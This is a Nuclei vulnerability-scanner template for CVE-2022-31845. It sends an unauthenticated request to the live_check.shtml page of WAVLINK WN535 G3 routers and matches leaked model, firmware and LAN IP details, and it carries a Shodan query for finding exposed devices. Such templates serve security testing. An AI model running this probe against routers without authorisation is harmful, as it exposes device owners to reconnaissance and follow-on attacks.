nuclei-templates/cves/2022/CVE-2022-31845.yaml

42 lines
1.1 KiB
YAML

id: CVE-2022-31845
info:
name: WAVLINK WN535 G3 - Information Disclosure
author: arafatansari
severity: high
description: |
A vulnerability in live_check.shtml of WAVLINK WN535 G3 M35G3R.V5030.180927 allows attackers to obtain sensitive router information via execution of the exec cmd function.
reference:
- https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3__check_live.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-31845
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30489
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-31845
cwe-id: CWE-668
metadata:
shodan-query: http.html:"Wavlink"
verified: "true"
tags: cve,cve2022,wavlink,exposure
requests:
- raw:
- |
@timeout: 10s
GET /live_check.shtml HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- 'Model='
- 'FW_Version='
- 'LanIP='
condition: and
- type: status
status:
- 200